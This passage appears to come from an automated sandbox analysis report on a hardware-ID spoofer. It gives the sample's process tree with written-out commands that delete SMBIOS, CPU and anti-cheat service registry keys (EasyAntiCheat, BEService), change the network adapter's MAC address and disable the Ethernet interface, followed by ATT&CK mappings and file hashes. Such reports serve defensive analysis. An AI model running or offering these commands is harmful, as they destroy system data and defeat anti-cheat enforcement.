  C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f >nul
  2⤵
  PID:5092
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    - Modifies registry key
    PID:2828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f >nul
  2⤵
  PID:3864
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
    3⤵
    - Modifies registry key
    PID:2468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f >nul
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
    3⤵
    - Modifies registry key
    PID:412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f >nul
  2⤵
  PID:556
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
    3⤵
    - Modifies registry key
    PID:216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f >nul
  2⤵
  PID:2648
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    - Modifies registry key
    PID:4332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f >nul
  2⤵
  PID:4972
- - C:\Windows\system32\reg.exe
    reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    - Modifies registry key
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f >nul
  2⤵
  PID:4916
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    - Modifies registry key
    PID:1864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f >nul
  2⤵
  PID:1780
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    - Modifies registry key
    PID:2996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\Mac.bat >nul
  2⤵
  PID:2324
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\Mac.bat
    3⤵
    PID:316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
      4⤵
      PID:1124
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic nic where physicaladapter=true get deviceid
        5⤵
        
        PID:4004
    - - C:\Windows\system32\findstr.exe
        
        findstr [0-9]
        5⤵
        
        PID:1244
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
      4⤵
      PID:3596
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
      4⤵
      PID:2860
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
      4⤵
      PID:4476
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v NetworkAddress /t REG_SZ /d C29344BE1177 /f
      4⤵
      PID:3420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
      4⤵
      PID:4056
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic nic where physicaladapter=true get deviceid
        5⤵
        
        PID:1116
    - - C:\Windows\system32\findstr.exe
        
        findstr [0-9]
        5⤵
        
        PID:1132
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
      4⤵
      PID:4436
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
      4⤵
      PID:3092
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
      4⤵
      PID:4664
  - - C:\Windows\system32\reg.exe
      REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v PnPCapabilities /t REG_DWORD /d 24 /f
      4⤵
      PID:5104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv"
      4⤵
      PID:3892
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv
        5⤵
        
        PID:3960
  - - C:\Windows\system32\netsh.exe
      netsh interface set interface name="Ethernet" disable
      4⤵
      PID:4316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
PID:1508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Neuer Ordner (2)\embed_payload.json

Filesize
207B

MD5
0357e1583c59f1f8dc2a63632b7481e5

SHA1
0056ffccf4772d1a3b6ccde6d3757babd52e8186

SHA256
cb925eb54437a5d3b3a36fe849feeb215d3c725c8218c54ba97d5479789e3ec4

SHA512
329264db0b8b2b29664333891658cd7f03fdd52b2127970fc4dc3302e9b9c1646cebb6d093fd7dcb72dd54e98fd9bfa77b710db7c9cbde4452242d388aebb196

Download Submit
C:\Windows\AMIDEWINx64.EXE

Filesize
453KB

MD5
6a6505b2413d2c7b16c6d059448db9e5

SHA1
dfe6c6b6051c26326a12dc9d0d5701cb4728266c

SHA256
53e3b72f8eb13acf3cb69d4cb124e8dc64fc541555c3c95cc8003b8046853955

SHA512
1c0531581f0efe683ab763f6633ace60f0637b22830e7ec551babe19ac777a1a6821dc568bce13a8abee8bfef1c7d9397e0bee1c78c00810c65dadd788dab2a3

Download Submit
C:\Windows\amifldrv64.sys

Filesize
18KB

MD5
785045f8b25cd2e937ddc6b09debe01a

SHA1
029c678674f482ababe8bbfdb93152392457109d

SHA256
37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba

SHA512
40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

Download Submit
memory/4848-7-0x00007FF7F224F000-0x00007FF7F25C2000-memory.dmp

Filesize
3.4MB

Download
memory/4848-8-0x00007FF7F2010000-0x00007FF7F2B87000-memory.dmp

Filesize
11.5MB

Download
memory/4848-0-0x00007FF7F224F000-0x00007FF7F25C2000-memory.dmp

Filesize
3.4MB

Download
memory/4848-6-0x00007FF7F2010000-0x00007FF7F2B87000-memory.dmp

Filesize
11.5MB

Download
memory/4848-1-0x00007FFAA6A30000-0x00007FFAA6A32000-memory.dmp

Filesize
8KB

Download
memory/4848-0-0x00007FF7F224F000-0x00007FF7F25C2000-memory.dmp

Filesize
3.4MB

Download
memory/4848-1-0x00007FFAA6A30000-0x00007FFAA6A32000-memory.dmp

Filesize
8KB

Download
memory/4848-6-0x00007FF7F2010000-0x00007FF7F2B87000-memory.dmp

Filesize
11.5MB

Download
memory/4848-7-0x00007FF7F224F000-0x00007FF7F25C2000-memory.dmp

Filesize
3.4MB

Download
memory/4848-8-0x00007FF7F2010000-0x00007FF7F2B87000-memory.dmp

Filesize
11.5MB

Download